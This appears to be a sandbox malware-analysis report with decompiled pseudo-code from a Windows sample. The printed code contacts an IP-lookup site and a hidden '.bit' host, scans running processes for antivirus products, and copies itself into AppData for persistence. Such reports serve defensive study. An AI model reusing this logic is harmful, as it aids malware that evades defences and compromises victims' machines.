                                    0x0f582f09
                                    0x0f582f3d
                                    0x0f582f3f
                                    0x0f582f0b
                                    0x0f582f17
                                    0x0f582f1c
                                    0x0f582f25
                                    0x00000000
                                    0x0f582f17
                                    0x0f582f09
                                    0x0f582ebf
                                    0x0f582ebf
                                    0x0f582e75
                                    0x0f582e75
                                    0x0f582d94
                                    0x0f582d9b
                                    0x00000000
                                    0x00000000
                                    0x0f582da1
                                    0x0f582da9
                                    0x0f582db1
                                    0x0f582db9
                                    0x0f582dc1
                                    0x0f582dc9
                                    0x0f582dd0
                                    0x00000000
                                    0x00000000
                                    0x0f582dd6
                                    0x0f582ddd
                                    0x00000000
                                    0x00000000
                                    0x0f582de3
                                    0x0f582de4
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74
                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F582E19
                                    • LoadCursorW.USER32 ref: 0F582E2E
                                    • LoadIconW.USER32 ref: 0F582E59
                                    • RegisterClassExW.USER32 ref: 0F582E68
                                    • ExitThread.KERNEL32 ref: 0F582E75
                                      • Part of subcall function 0F582F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F582F8D
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582E7B
                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F582E81
                                    • CreateWindowExW.USER32 ref: 0F582EA7
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0F582EB4
                                    • ExitThread.KERNEL32 ref: 0F582EBF
                                      • Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F582FA8
                                      • Part of subcall function 0F582F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F582FCF
                                      • Part of subcall function 0F582F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F582FE3
                                      • Part of subcall function 0F582F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F582FFA
                                    • ExitThread.KERNEL32 ref: 0F582F3F
                                      • Part of subcall function 0F582AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F582AEA
                                      • Part of subcall function 0F582AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
                                      • Part of subcall function 0F582AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
                                      • Part of subcall function 0F582AD0: ExitThread.KERNEL32 ref: 0F582C47
                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F582EC8
                                    • UpdateWindow.USER32 ref: 0F582ECF
                                    • CreateThread.KERNEL32 ref: 0F582EE3
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582EEE
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F05
                                    • TranslateMessage.USER32(?), ref: 0F582F1C
                                    • DispatchMessageW.USER32 ref: 0F582F23
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F37
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                    • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                    • API String ID: 3011903443-520298170
                                    • Opcode ID: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
                                    • Instruction ID: 142506e2248bef634949804d404099a8f810a23c99f06cee0db32062ad680c9c
                                    • Opcode Fuzzy Hash: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
                                    • Instruction Fuzzy Hash: 27515E70648301AFE310AF618D49B5B7FE4BF44B55F10492DF684BA281E7B8A14BCF96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 100%
                                    			E0F588050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                    				long _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				short _v68;
                                    				void* _t38;
                                    				void* _t40;
                                    				WCHAR* _t41;
                                    				long _t54;
                                    				long _t59;
                                    				WCHAR* _t62;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    				void* _t67;
                                    
                                    				_t64 = __ecx;
                                    				_t38 =  *(__ecx + 4);
                                    				if(_t38 != 0) {
                                    					InternetCloseHandle(_t38);
                                    				}
                                    				E0F587E40(_t64); // executed
                                    				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
                                    				_t65 = _t40;
                                    				_v12 = 0;
                                    				_v16 = _t65;
                                    				if(_t65 != 0) {
                                    					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
                                    					_t62 = _t41;
                                    					_v20 = _t62;
                                    					wsprintfW(_t62, L"%s", _a8);
                                    					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                    					if(_t63 != 0) {
                                    						_v68 = 0x6f0048;
                                    						_v64 = 0x740073;
                                    						_v60 = 0x20003a;
                                    						_v56 = 0x6f0070;
                                    						_v52 = 0x69006c;
                                    						_v48 = 0x690074;
                                    						_v44 = 0x720061;
                                    						_v40 = 0x6d006f;
                                    						_v36 = 0x6e0061;
                                    						_v32 = 0x2e0061;
                                    						_v28 = 0x690062;
                                    						_v24 = 0x74;
                                    						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
                                    							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
                                    								GetLastError();
                                    							} else {
                                    								_t67 = _a20;
                                    								_t59 = _a24 - 1;
                                    								_a4 = 0;
                                    								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                    									while(1) {
                                    										_t54 = _a4;
                                    										if(_t54 == 0) {
                                    											goto L13;
                                    										}
                                    										 *((char*)(_t54 + _t67)) = 0;
                                    										_a4 = 0;
                                    										_v12 = 1;
                                    										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                    											continue;
                                    										} else {
                                    										}
                                    										goto L13;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L13:
                                    					InternetCloseHandle(_t63); // executed
                                    					InternetCloseHandle(_v16);
                                    					VirtualFree(_v20, 0, 0x8000); // executed
                                    					return _v12;
                                    				} else {
                                    					return _t40;
                                    				}
                                    			}




























                                    0x0f588058
                                    0x0f58805b
                                    0x0f588060
                                    0x0f588063
                                    0x0f588063
                                    0x0f58806b
                                    0x0f588082
                                    0x0f588088
                                    0x0f58808a
                                    0x0f588091
                                    0x0f588096
                                    0x0f5880af
                                    0x0f5880b8
                                    0x0f5880c0
                                    0x0f5880c3
                                    0x0f5880e7
                                    0x0f5880eb
                                    0x0f5880f8
                                    0x0f588101
                                    0x0f588108
                                    0x0f58810f
                                    0x0f588116
                                    0x0f58811d
                                    0x0f588124
                                    0x0f58812b
                                    0x0f588132
                                    0x0f588139
                                    0x0f588140
                                    0x0f588147
                                    0x0f588156
                                    0x0f58816d
                                    0x0f5881bc
                                    0x0f58816f
                                    0x0f588175
                                    0x0f588178
                                    0x0f58817d
                                    0x0f58818c
                                    0x0f588190
                                    0x0f588190
                                    0x0f588195
                                    0x00000000
                                    0x00000000
                                    0x0f588197
                                    0x0f5881a2
                                    0x0f5881a9
                                    0x0f5881b8
                                    0x00000000
                                    0x00000000
                                    0x0f5881ba
                                    0x00000000
                                    0x0f5881b8
                                    0x0f588190
                                    0x0f58818c
                                    0x0f58816d
                                    0x0f588156
                                    0x0f5881c2
                                    0x0f5881c9
                                    0x0f5881ce
                                    0x0f5881da
                                    0x0f5881e9
                                    0x0f58809e
                                    0x0f58809e
                                    0x0f58809e

                                    APIs
                                    • InternetCloseHandle.WININET(?), ref: 0F588063
                                    • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082
                                    • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F587046,ipv4bot.whatismyipaddress.com,0F58FF90), ref: 0F5880AF
                                    • wsprintfW.USER32 ref: 0F5880C3
                                    • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F5880E1
                                    • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F58814E
                                    • HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F588165
                                    • InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F588184
                                    • InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F5881B0
                                    • GetLastError.KERNEL32 ref: 0F5881BC
                                    • InternetCloseHandle.WININET(00000000), ref: 0F5881C9
                                    • InternetCloseHandle.WININET(00000000), ref: 0F5881CE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F587046), ref: 0F5881DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                    • String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
                                    • API String ID: 3906118045-2187218134
                                    • Opcode ID: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
                                    • Instruction ID: fb9741fe322c9d45a71f587c5887f673f2e20cb36e725705d743cf1e3b9af782
                                    • Opcode Fuzzy Hash: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
                                    • Instruction Fuzzy Hash: 6341B430600208BBEB109F51DC48FEE7FB9FF04B55F504119F904B6281C7B99956DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 362 f587b70-f587c0a VirtualAlloc * 2 363 f587c0c-f587c22 CreateToolhelp32Snapshot 362->363 364 f587c32-f587c3a 362->364 365 f587c3d-f587c57 Process32FirstW 363->365 366 f587c24-f587c2c VirtualFree 363->366 367 f587d2d-f587d4b VirtualFree FindCloseChangeNotification 365->367 368 f587c5d 365->368 366->364 370 f587d4d-f587d55 VirtualFree 367->370 371 f587d57-f587d5f 367->371 369 f587c60-f587c62 368->369 372 f587c68-f587c6b 369->372 373 f587d07-f587d0b 369->373 370->371 376 f587c70-f587c7d 372->376 374 f587d0d-f587d13 373->374 375 f587d25-f587d2b 373->375 374->375 377 f587d15-f587d20 lstrlenW 374->377 375->367 379 f587c8a-f587c98 376->379 380 f587c7f-f587c83 376->380 377->375 382 f587c9a-f587cad lstrcpyW lstrcatW 379->382 383 f587caf-f587cbe lstrcatW * 2 379->383 380->376 381 f587c85-f587c88 380->381 385 f587ce7-f587cf6 Process32NextW 381->385 384 f587cc0-f587ce4 lstrlenW 382->384 383->384 384->385 385->373 386 f587cf8-f587d01 GetLastError 385->386 386->369 386->373
                                    C-Code - Quality: 80%
                                    			E0F587B70(void** _a4, intOrPtr* _a8) {
                                    				signed int _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _v20;
                                    				void* _v24;
                                    				WCHAR* _v28;
                                    				WCHAR* _v32;
                                    				WCHAR* _v36;
                                    				WCHAR* _v40;
                                    				WCHAR* _v44;
                                    				WCHAR* _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				WCHAR* _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				WCHAR* _v72;
                                    				WCHAR* _v76;
                                    				WCHAR* _v80;
                                    				void* _t46;
                                    				void* _t47;
                                    				void* _t49;
                                    				int _t50;
                                    				WCHAR* _t56;
                                    				int _t63;
                                    				void** _t68;
                                    				void* _t75;
                                    				long _t76;
                                    				WCHAR* _t77;
                                    				signed int _t79;
                                    				void* _t83;
                                    
                                    				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    				_t68 = _a4;
                                    				 *_t68 = _t46;
                                    				_v80 = L"AVP.EXE";
                                    				_v76 = L"ekrn.exe";
                                    				_v72 = L"avgnt.exe";
                                    				_v68 = L"ashDisp.exe";
                                    				_v64 = L"NortonAntiBot.exe";
                                    				_v60 = L"Mcshield.exe";
                                    				_v56 = L"avengine.exe";
                                    				_v52 = L"cmdagent.exe";
                                    				_v48 = L"smc.exe";
                                    				_v44 = L"persfw.exe";
                                    				_v40 = L"pccpfw.exe";
                                    				_v36 = L"fsguiexe.exe";
                                    				_v32 = L"cfp.exe";
                                    				_v28 = L"msmpeng.exe";
                                    				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                    				_t75 = _t47;
                                    				_v24 = _t75;
                                    				if(_t75 == 0) {
                                    					L3:
                                    					return 0;
                                    				} else {
                                    					 *_t75 = 0x22c; // executed
                                    					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                    					_v20 = _t49;
                                    					if(_t49 != 0xffffffff) {
                                    						_t79 = 0;
                                    						_push(_t75);
                                    						_v12 = 0;
                                    						_a4 = 0;
                                    						_v16 = 0;
                                    						_v8 = 0;
                                    						_t50 = Process32FirstW(_t49); // executed
                                    						if(_t50 != 0) {
                                    							L6:
                                    							while(_t79 == 0) {
                                    								_t77 = _t75 + 0x24;
                                    								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                    									_t79 = _t79 + 1;
                                    									if(_t79 < 0xe) {
                                    										continue;
                                    									} else {
                                    										_t79 = _v8;
                                    									}
                                    									L15:
                                    									_t75 = _v24;
                                    									_t63 = Process32NextW(_v20, _t75); // executed
                                    									if(_t63 != 0 && GetLastError() != 0x12) {
                                    										goto L6;
                                    									}
                                    									goto L17;
                                    								}
                                    								_push(_t77);
                                    								_push( *_t68);
                                    								_v16 = 1;
                                    								if(_a4 != 0) {
                                    									lstrcatW();
                                    									lstrcatW( *_t68, ",");
                                    								} else {
                                    									lstrcpyW();
                                    									lstrcatW( *_t68, ",");
                                    								}
                                    								_a4 =  &(_a4[0]);
                                    								_v12 = _v12 + lstrlenW(_t77) * 2;
                                    								_t79 =  >  ? 1 : _v8;
                                    								_v8 = _t79;
                                    								goto L15;
                                    							}
                                    							L17:
                                    							if(_v16 != 0) {
                                    								_t56 =  *_t68;
                                    								if( *_t56 != 0) {
                                    									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                    								}
                                    							}
                                    							 *_a8 = _v12;
                                    						}
                                    						VirtualFree(_t75, 0, 0x8000); // executed
                                    						FindCloseChangeNotification(_v20); // executed
                                    						_t76 = _v16;
                                    						if(_t76 == 0) {
                                    							VirtualFree( *_t68, _t76, 0x8000); // executed
                                    						}
                                    						return _t76;
                                    					} else {
                                    						VirtualFree(_t75, 0, 0x8000);
                                    						goto L3;
                                    					}
                                    				}
                                    			}


































                                    0x0f587b8d
                                    0x0f587b8f
                                    0x0f587b9d
                                    0x0f587b9f
                                    0x0f587ba6
                                    0x0f587bad
                                    0x0f587bb4
                                    0x0f587bbb
                                    0x0f587bc2
                                    0x0f587bc9
                                    0x0f587bd0
                                    0x0f587bd7
                                    0x0f587bde
                                    0x0f587be5
                                    0x0f587bec
                                    0x0f587bf3
                                    0x0f587bfa
                                    0x0f587c01
                                    0x0f587c03
                                    0x0f587c05
                                    0x0f587c0a
                                    0x0f587c34
                                    0x0f587c3a
                                    0x0f587c0c
                                    0x0f587c10
                                    0x0f587c16
                                    0x0f587c1c
                                    0x0f587c22
                                    0x0f587c3f
                                    0x0f587c41
                                    0x0f587c43
                                    0x0f587c46
                                    0x0f587c49
                                    0x0f587c4c
                                    0x0f587c4f
                                    0x0f587c57
                                    0x00000000
                                    0x0f587c60
                                    0x0f587c68
                                    0x0f587c70
                                    0x0f587c7f
                                    0x0f587c83
                                    0x00000000
                                    0x0f587c85
                                    0x0f587c85
                                    0x0f587c85
                                    0x0f587ce7
                                    0x0f587ce7
                                    0x0f587cee
                                    0x0f587cf6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f587cf6
                                    0x0f587c8e
                                    0x0f587c8f
                                    0x0f587c91
                                    0x0f587c98
                                    0x0f587cb5
                                    0x0f587cbe
                                    0x0f587c9a
                                    0x0f587c9a
                                    0x0f587ca7
                                    0x0f587ca7
                                    0x0f587cc0
                                    0x0f587cde
                                    0x0f587ce1
                                    0x0f587ce4
                                    0x00000000
                                    0x0f587ce4
                                    0x0f587d07
                                    0x0f587d0b
                                    0x0f587d0d
                                    0x0f587d13
                                    0x0f587d20
                                    0x0f587d20
                                    0x0f587d13
                                    0x0f587d2b
                                    0x0f587d2b
                                    0x0f587d3b
                                    0x0f587d40
                                    0x0f587d46
                                    0x0f587d4b
                                    0x0f587d55
                                    0x0f587d55
                                    0x0f587d5f
                                    0x0f587c24
                                    0x0f587c2c
                                    0x00000000
                                    0x0f587c2c
                                    0x0f587c22

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F587C01
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C
                                    • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F587C4F
                                    • lstrcmpiW.KERNEL32(0F5903AC,-00000024), ref: 0F587C75
                                    • Process32NextW.KERNEL32(?,?), ref: 0F587CEE
                                    • GetLastError.KERNEL32 ref: 0F587CF8
                                    • lstrlenW.KERNEL32(00000000), ref: 0F587D16
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587D3B
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0F587D40
                                    • VirtualFree.KERNELBASE(?,?,00008000), ref: 0F587D55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
                                    • String ID: i)w
                                    • API String ID: 1411803383-1280834553
                                    • Opcode ID: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
                                    • Instruction ID: bf7ffb222bc93faeca42814bda6c4ed375b14932ef22ecdb0bff7d343602f07c
                                    • Opcode Fuzzy Hash: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
                                    • Instruction Fuzzy Hash: 5851AE71900218EBCF149FA4E948BAE7FB4FF48725F20406AE505BB381C7746906DF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 387 f582ad0-f582b00 VirtualAlloc 388 f582b1c-f582b1e 387->388 389 f582b02-f582b1a 387->389 390 f582b20-f582b4a GetModuleFileNameW GetTempPathW call f5881f0 388->390 389->390 393 f582b4c-f582b4e 390->393 394 f582b53-f582bae lstrlenW call f5882b0 GetEnvironmentVariableW call f5881f0 390->394 395 f582c40 call f582960 393->395 402 f582bd8-f582c07 lstrcatW * 3 call f582890 394->402 403 f582bb0-f582bc4 394->403 400 f582c45-f582c47 ExitThread 395->400 402->400 407 f582c09-f582c1d 402->407 408 f582bd3 403->408 409 f582bc6-f582bd1 403->409 413 f582c2c 407->413 414 f582c1f-f582c2a 407->414 410 f582bd5-f582bd6 408->410 409->408 409->410 412 f582c2f-f582c3d wsprintfW 410->412 412->395 415 f582c2e 413->415 414->413 414->415 415->412
                                    C-Code - Quality: 93%
                                    			E0F582AD0() {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				short _v20;
                                    				WCHAR* _v24;
                                    				WCHAR* _v28;
                                    				long _v32;
                                    				intOrPtr _v36;
                                    				WCHAR* _t24;
                                    				void* _t27;
                                    				WCHAR* _t33;
                                    				WCHAR* _t38;
                                    				signed int _t40;
                                    				signed int _t46;
                                    				WCHAR* _t50;
                                    				WCHAR* _t54;
                                    				void* _t56;
                                    				WCHAR* _t57;
                                    				void* _t58;
                                    				WCHAR* _t64;
                                    				WCHAR* _t65;
                                    				WCHAR* _t67;
                                    				signed int _t69;
                                    				void* _t71;
                                    				void* _t72;
                                    
                                    				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                    				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
                                    				_v24 = _t24;
                                    				_t64 = _t24;
                                    				_v32 = 0;
                                    				if(_t24 == 0) {
                                    					_t67 = 0;
                                    					_t50 = 0;
                                    					__eflags = 0;
                                    				} else {
                                    					_t3 =  &(_t24[0x101]); // 0x202
                                    					_t65 = _t3;
                                    					_v32 = 0x404;
                                    					_t50 = _t65;
                                    					_t67 = _t24;
                                    					_t64 =  &(_t65[0x101]);
                                    				}
                                    				_v28 = _t67;
                                    				GetModuleFileNameW(0, _t67, 0x100);
                                    				GetTempPathW(0x100, _t50);
                                    				_t6 =  &(_t50[1]); // 0x204
                                    				_t27 = E0F5881F0(_t67, _t6);
                                    				_t75 = _t27;
                                    				if(_t27 == 0) {
                                    					_v20 = 0x520050;
                                    					_v8 = 0;
                                    					_push(0x52);
                                    					_v16 = 0x440049;
                                    					_v12 = 0x520055;
                                    					E0F5882B0( &_v20, lstrlenW( &_v20)); // executed
                                    					_t72 = _t71 + 4;
                                    					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                    					_t13 =  &(_t50[1]); // 0x2
                                    					_t54 = _t67;
                                    					_t33 = E0F5881F0(_t54, _t13);
                                    					__eflags = _t33;
                                    					if(_t33 == 0) {
                                    						lstrcatW(_t50, L"\\Microsoft\\");
                                    						lstrcatW(_t50,  &_v20);
                                    						lstrcatW(_t50, L".exe");
                                    						_push(_t54);
                                    						_t38 = E0F582890(_v28, _t50);
                                    						_t72 = _t72 + 4;
                                    						__eflags = _t38;
                                    						if(_t38 == 0) {
                                    							goto L17;
                                    						}
                                    						_t40 = lstrlenW(_t50);
                                    						__eflags = _v28;
                                    						_t56 = 0xa + _t40 * 2;
                                    						if(_v28 == 0) {
                                    							L13:
                                    							_t64 = 0;
                                    							__eflags = 0;
                                    							L14:
                                    							_push(_t50);
                                    							L15:
                                    							wsprintfW(_t64, L"\"%s\"");
                                    							_t57 = _t64;
                                    							goto L16;
                                    						}
                                    						__eflags = _v36 + _t56 - 0x800;
                                    						if(__eflags < 0) {
                                    							goto L14;
                                    						}
                                    						goto L13;
                                    					}
                                    					_t46 = lstrlenW(_t67);
                                    					__eflags = _v28;
                                    					_t58 = 0xa + _t46 * 2;
                                    					if(_v28 == 0) {
                                    						L8:
                                    						_t64 = 0;
                                    						__eflags = 0;
                                    						L9:
                                    						_push(_t67);
                                    						goto L15;
                                    					}
                                    					__eflags = _v36 + _t58 - 0x800;
                                    					if(__eflags < 0) {
                                    						goto L9;
                                    					}
                                    					goto L8;
                                    				} else {
                                    					_t57 = _t67;
                                    					L16:
                                    					E0F582960(_t57, _t75); // executed
                                    					L17:
                                    					ExitThread(0);
                                    				}
                                    			}




























                                    0x0f582ad6
                                    0x0f582aea
                                    0x0f582af0
                                    0x0f582af4
                                    0x0f582af6
                                    0x0f582b00
                                    0x0f582b1c
                                    0x0f582b1e
                                    0x0f582b1e
                                    0x0f582b02
                                    0x0f582b02
                                    0x0f582b02
                                    0x0f582b08
                                    0x0f582b10
                                    0x0f582b12
                                    0x0f582b14
                                    0x0f582b14
                                    0x0f582b28
                                    0x0f582b2c
                                    0x0f582b38
                                    0x0f582b3e
                                    0x0f582b43
                                    0x0f582b48
                                    0x0f582b4a
                                    0x0f582b55
                                    0x0f582b62
                                    0x0f582b67
                                    0x0f582b6c
                                    0x0f582b75
                                    0x0f582b89
                                    0x0f582b8e
                                    0x0f582b9c
                                    0x0f582ba2
                                    0x0f582ba5
                                    0x0f582ba7
                                    0x0f582bac
                                    0x0f582bae
                                    0x0f582be4
                                    0x0f582bec
                                    0x0f582bf4
                                    0x0f582bf6
                                    0x0f582bfd
                                    0x0f582c02
                                    0x0f582c05
                                    0x0f582c07
                                    0x00000000
                                    0x00000000
                                    0x0f582c0f
                                    0x0f582c11
                                    0x0f582c16
                                    0x0f582c1d
                                    0x0f582c2c
                                    0x0f582c2c
                                    0x0f582c2c
                                    0x0f582c2e
                                    0x0f582c2e
                                    0x0f582c2f
                                    0x0f582c35
                                    0x0f582c3b
                                    0x00000000
                                    0x0f582c3d
                                    0x0f582c25
                                    0x0f582c2a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f582c2a
                                    0x0f582bb6
                                    0x0f582bb8
                                    0x0f582bbd
                                    0x0f582bc4
                                    0x0f582bd3
                                    0x0f582bd3
                                    0x0f582bd3
                                    0x0f582bd5
                                    0x0f582bd5
                                    0x00000000
                                    0x0f582bd5
                                    0x0f582bcc
                                    0x0f582bd1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f582b4c
                                    0x0f582b4c
                                    0x0f582c40
                                    0x0f582c40
                                    0x0f582c45
                                    0x0f582c47
                                    0x0f582c47

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F582AEA
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
                                    • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
                                    • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F582B7D
                                      • Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
                                      • Part of subcall function 0F5882B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F5882FB
                                      • Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
                                      • Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
                                      • Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
                                      • Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
                                      • Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
                                    • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F582B9C
                                    • lstrcatW.KERNEL32 ref: 0F582BE4
                                    • lstrcatW.KERNEL32 ref: 0F582BEC
                                    • lstrcatW.KERNEL32 ref: 0F582BF4
                                    • wsprintfW.USER32 ref: 0F582C35
                                    • ExitThread.KERNEL32 ref: 0F582C47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
